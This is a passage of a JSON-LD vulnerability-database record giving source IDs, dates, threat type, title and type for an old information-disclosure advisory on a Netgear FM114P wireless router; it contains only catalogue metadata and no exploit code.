"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-04-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"date": "2003-04-03T00:00:00",
"db": "BID",
"id": "7267"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "7267"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear FM114P ProSafe Wireless Router UPnP Information Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Configuration Error",
"sources": [
{
"db": "BID",
"id": "7267"
}
],
"trust": 0.3
}
}